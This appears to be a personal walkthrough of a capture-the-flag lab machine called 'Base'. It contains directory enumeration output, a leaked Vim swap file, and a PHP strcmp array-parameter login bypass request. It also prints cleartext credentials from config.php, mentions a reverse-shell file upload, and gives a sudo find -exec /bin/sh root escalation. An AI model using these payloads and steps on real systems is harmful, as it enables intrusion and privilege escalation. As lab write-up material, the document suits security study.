┌──(sabeshan㉿kali)-[~]
└─$ dirsearch -u http://10.129.243.139/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/sabeshan/reports/http_10.129.243.139/__25-08-26_18-17-47.txt

Target: http://10.129.243.139/

[18:17:47] Starting: 
[18:18:03] 403 -  279B  - /.htaccess.bak1                                   
[18:18:03] 403 -  279B  - /.ht_wsr.txt                                      
[18:18:03] 403 -  279B  - /.htaccess.sample                                 
[18:18:03] 403 -  279B  - /.htaccess.save                                   
[18:18:03] 403 -  279B  - /.htaccess.orig                                   
[18:18:03] 403 -  279B  - /.htaccess_extra                                  
[18:18:03] 403 -  279B  - /.htaccess_orig
[18:18:03] 403 -  279B  - /.htaccessOLD                                     
[18:18:03] 403 -  279B  - /.htaccess_sc                                     
[18:18:03] 403 -  279B  - /.htaccessBAK                                     
[18:18:03] 403 -  279B  - /.html
[18:18:03] 403 -  279B  - /.htm
[18:18:03] 403 -  279B  - /.htaccessOLD2
[18:18:03] 403 -  279B  - /.htpasswd_test                                   
[18:18:03] 403 -  279B  - /.httr-oauth                                      
[18:18:03] 403 -  279B  - /.htpasswds                                       
[18:18:08] 403 -  279B  - /.php                                             
[18:18:55] 301 -  317B  - /assets  ->  http://10.129.243.139/assets/        
[18:18:55] 200 -  500B  - /assets/                                          
[18:19:28] 301 -  316B  - /forms  ->  http://10.129.243.139/forms/          
[18:19:45] 301 -  316B  - /login  ->  http://10.129.243.139/login/          
[18:19:45] 200 -  504B  - /login/                                           
[18:19:46] 302 -    0B  - /logout.php  ->  /login.php                       
[18:20:27] 403 -  279B  - /server-status/                                   
[18:20:28] 403 -  279B  - /server-status                                    
[18:20:53] 302 -    0B  - /upload.php  ->  /login/login.php
--------------------------------------------------------------------------
1.                                                                                                                                                                                                                
┌──(sabeshan㉿kali)-[~/Downloads]
└─$ strings login.php.swp
b0VIM 8.0
root
base
/var/www/html/login/login.php
3210
#"! 
                  <input type="text" name="username" class="form-control" style="max-width: 30%;" id="username" placeholder="Your Username" required>
                <div class="form-group">
              <div class="row" align="center">
            <form id="login-form" action="" method="POST" role="form" style="background-color:#f8fbfe">
          <div class="col-lg-12 mt-5 mt-lg-0">
        <div class="row mt-2">
        </div>
          <p>Use the form below to log into your account.</p>
          <h2>Login</h2>
        <div class="section-title mt-5" >
      <div class="container" data-aos="fade-up">
    <section id="login" class="contact section-bg" style="padding: 160px 0">
    <!-- ======= Login Section ======= -->
  </header><!-- End Header -->
    </div>
      </nav><!-- .navbar -->
        <i class="bi bi-list mobile-nav-toggle"></i>
        </ul>
          <li><a class="nav-link scrollto action" href="/login.php">Login</a></li>
          <li><a class="nav-link scrollto" href="/#contact">Contact</a></li>
          <li><a class="nav-link scrollto" href="/#pricing">Pricing</a></li>
          <li><a class="nav-link scrollto" href="/#team">Team</a></li>
          <li><a class="nav-link scrollto" href="/#services">Services</a></li>
          <li><a class="nav-link scrollto" href="/#about">About</a></li>
          <li><a class="nav-link scrollto" href="/#hero">Home</a></li>
        <ul>
      <nav id="navbar" class="navbar">
      <!-- <a href="index.html" class="logo"><img src="../assets/img/logo.png" alt="" class="img-fluid"></a>-->
      <!-- Uncomment below if you prefer to use an image logo -->
      <h1 class="logo"><a href="index.html">BASE</a></h1>
    <div class="container d-flex align-items-center justify-content-between">
  <header id="header" class="fixed-top">
  <!-- ======= Header ======= -->
<body>
</head>
  <link href="../assets/css/style.css" rel="stylesheet">
  <!-- Template Main CSS File -->
  <link href="../assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">
  <link href="../assets/vendor/remixicon/remixicon.css" rel="stylesheet">
  <link href="../assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">
  <link href="../assets/vendor/boxicons/css/boxicons.min.css" rel="stylesheet">
  <link href="../assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
  <link href="../assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
  <link href="../assets/vendor/aos/aos.css" rel="stylesheet">
  <!-- Vendor CSS Files -->
  <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i|Raleway:300,300i,400,400i,500,500i,600,600i,700,700i|Poppins:300,300i,400,400i,500,500i,600,600i,700,700i" rel="stylesheet">
  <!-- Google Fonts -->
  <link href="../assets/img/apple-touch-icon.png" rel="apple-touch-icon">
  <link href="../assets/img/favicon.png" rel="icon">
  <!-- Favicons -->
  <meta content="" name="keywords">
  <meta content="" name="description">
  <title>Welcome to Base</title>
  <meta content="width=device-width, initial-scale=1.0" name="viewport">
  <meta charset="utf-8">
<head>
<html lang="en">
<!DOCTYPE html>
    }
        print("<script>alert('Wrong Username or Password')</script>");
    } else {
        }
            print("<script>alert('Wrong Username or Password')</script>");
        } else {
            header("Location: /upload.php");
            $_SESSION['user_id'] = 1;
        if (strcmp($password, $_POST['password']) == 0) {
    if (strcmp($username, $_POST['username']) == 0) {
    require('config.php');
if (!empty($_POST['username']) && !empty($_POST['password'])) {
session_start();
<?php
</html>
</body>
  <script src="../assets/js/main.js"></script>
-------------------------------------------------------------------------------------------
2.if (strcmp($password, $_POST['password']) == 0) {
    if (strcmp($username, $_POST['username']) == 0) { From these lines looks different we can try the password.
POST /login/login.php HTTP/1.1

Host: 10.129.243.139

Content-Length: 32

Cache-Control: max-age=0

Accept-Language: en-US,en;q=0.9

Origin: http://10.129.243.139

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://10.129.243.139/login/login.php

Accept-Encoding: gzip, deflate, br

Cookie: PHPSESSID=pmivi2chdfnkstl8uphun3ctbt

Connection: keep-alive

username[]=admin&password[]=pass
This thing is bypass the login. and login to the admin pannel.
-------------------------------------------------------------------------------------
gobuster dir -u http://10.129.243.139/ -w /usr/share/wordlists/dirb/big.txt -t 100                                                
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.243.139/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/_uploaded            (Status: 301) [Size: 320] [--> http://10.129.243.139/_uploaded/]
/assets               (Status: 301) [Size: 317] [--> http://10.129.243.139/assets/]
/forms                (Status: 301) [Size: 316] [--> http://10.129.243.139/forms/]
/login                (Status: 301) [Size: 316] [--> http://10.129.243.139/login/]

-------------------------------------------------------------------------------------------------------------
3.After the admin panel i got the vulnerability called file uploaded and upload the reverse shell file and get the initial web shell access.
www-data@base:/var/www/html$ cd assets/
www-data@base:/var/www/html/assets$ ls -la
total 28
drwxr-xr-x  7 root root 4096 Jun  4  2022 .
drwxr-xr-x  6 root root 4096 Jun  9  2022 ..
drwxr-xr-x  2 root root 4096 Jun  4  2022 css
drwxr-xr-x  2 root root 4096 Jun  4  2022 fonts
drwxr-xr-x  6 root root 4096 Nov 21  2021 img
drwxr-xr-x  2 root root 4096 Jun  4  2022 js
drwxr-xr-x 12 root root 4096 Nov 21  2021 vendor
www-data@base:/var/www/html/assets$ cd ..
www-data@base:/var/www/html$ cd login
www-data@base:/var/www/html/login$ ls -la
total 36
drwxr-xr-x 2 root root  4096 Jun 15  2022 .
drwxr-xr-x 6 root root  4096 Jun  9  2022 ..
-rwxr-xr-x 1 root root    61 Jun  4  2022 config.php
-rwxr-xr-x 1 root root  7624 Jun 15  2022 login.php
-rw-r--r-- 1 root root 16384 Jun  4  2022 login.php.swp
www-data@base:/var/www/html/login$ cat config.php
<?php
$username = "admin";
$password = "thisisagoodpassword";www-data@base:/var/www/html/login$ 
------------------------------------------------------------------------------------------------------------------------
4.I got the users on the system 
┌──(sabeshan㉿kali)-[~/Downloads]
└─$ ssh john@10.129.243.139           
The authenticity of host '10.129.243.139 (10.129.243.139)' can't be established.
ED25519 key fingerprint is SHA256:k5IdZDsfwGXeUvZjXYi4d9cAO2nJByqN20fOhFdpZTo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.243.139' (ED25519) to the list of known hosts.
john@10.129.243.139's password: 
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Aug 26 13:25:39 UTC 2025

  System load:  0.0               Processes:             111
  Usage of /:   62.8% of 2.83GB   Users logged in:       0
  Memory usage: 8%                IP address for ens160: 10.129.243.139
  Swap usage:   0%


10 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


john@base:~$ sudo -l
[sudo] password for john: 
Matching Defaults entries for john on base:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on base:
    (root : root) /usr/bin/find
john@base:~$ 
there is privilege to access the root in the find binary we can execute it.
for this escaltion we can use the GTFObin.
-----------------------------------------------------------------------------------------------------------------------
john@base:~$ sudo -l
[sudo] password for john: 
Matching Defaults entries for john on base:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on base:
    (root : root) /usr/bin/find
john@base:~$ sudo find . -exec /bin/sh \; -quit
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# 
Finally i got rooted the machines.
